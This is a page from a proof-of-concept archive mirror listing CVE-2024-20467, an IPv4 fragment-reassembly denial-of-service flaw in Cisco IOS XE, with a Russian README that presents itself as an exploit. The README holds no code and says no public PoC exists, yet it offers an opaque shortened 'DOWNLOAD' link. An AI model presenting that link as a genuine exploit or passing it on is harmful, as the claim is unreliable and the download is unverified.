Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-20467 PoC — Cisco IOS XE Software 安全漏洞

Source
Associated Vulnerability
Title:Cisco IOS XE Software 安全漏洞 (CVE-2024-20467)
Description:A vulnerability in the implementation of the IPv4 fragmentation reassembly code in Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to improper management of resources during fragment reassembly. An attacker could exploit this vulnerability by sending specific sizes of fragmented packets to an affected device or through a Virtual Fragmentation Reassembly (VFR)-enabled interface on an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition. Note: This vulnerability affects Cisco ASR 1000 Series Aggregation Services Routers and Cisco cBR-8 Converged Broadband Routers if they are running Cisco IOS XE Software Release 17.12.1 or 17.12.1a.
Readme
# Эксплоит для уязвимости в Cisco IOS XE CVE-2024-20467

## Обзор
Данный эксплоит нацелен на уязвимость в коде сборки фрагментов IPv4, найденном в Cisco IOS XE Software. Уязвимость позволяет неаутентифицированному удаленному атакующему вызвать состояние отказа в обслуживании (DoS) на уязвимых устройствах.

## Затронутые устройства
- Маршрутизаторы: Cisco ASR 1000 Series
- Модели: Cisco cBR-8
- Версии ПО: Cisco IOS XE Software Release 17.12.1 и 17.12.1a

## Детали уязвимости
- Тип: Отказ в обслуживании (DoS)
- Причина: Неправильное управление ресурсами во время сборки фрагментов.

## Вектор атаки
Атакующий может использовать эту уязвимость, отправляя специально сконструированные фрагментированные пакеты на целевое устройство, как напрямую, так и через интерфейс с включенной виртуальной сборкой фрагментов (VFR). Успешная эксплуатация может привести к перезагрузке устройства и вызвать состояние отказа в обслуживании.

## Влияние
- Отказ в обслуживании: Уязвимые устройства могут неожиданно перезагрузиться, что приведет к значительному времени простоя и перебоям в обслуживании.
- Риск для критической инфраструктуры: Уязвимость представляет угрозу для важных сетевых сервисов и может повлиять на бизнес-процессы.

## Детали эксплуатации
На данный момент нет известных публичных доказательств концепции или активных случаев эксплуатации. Однако потенциальная возможность использования этого эксплоита в реальных атаках остается.

## Меры по смягчению
1. Обновление ПО: Установите неуязвимую версию Cisco IOS XE Software как можно скорее.
2. Сегментация сети: Ограничьте доступность уязвимых устройств с помощью надежной сегментации сети.
3. Мониторинг трафика: Отслеживайте сетевой трафик на наличие необычных паттернов, особенно фрагментированных IPv4 пакетов.
4. Системы обнаружения: Используйте IDS/IPS системы для идентификации и блокировки вредоносного трафика.
5. Регулярные обновления: Оставайтесь в курсе обновлений безопасности и патчей от Cisco.

##[DOWNLOAD]( https://t.ly/cLxfS)
File Snapshot

[4.0K] /data/pocs/825a0aee65f45d10ec28d83ded599109393cc1d4 └── [3.4K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →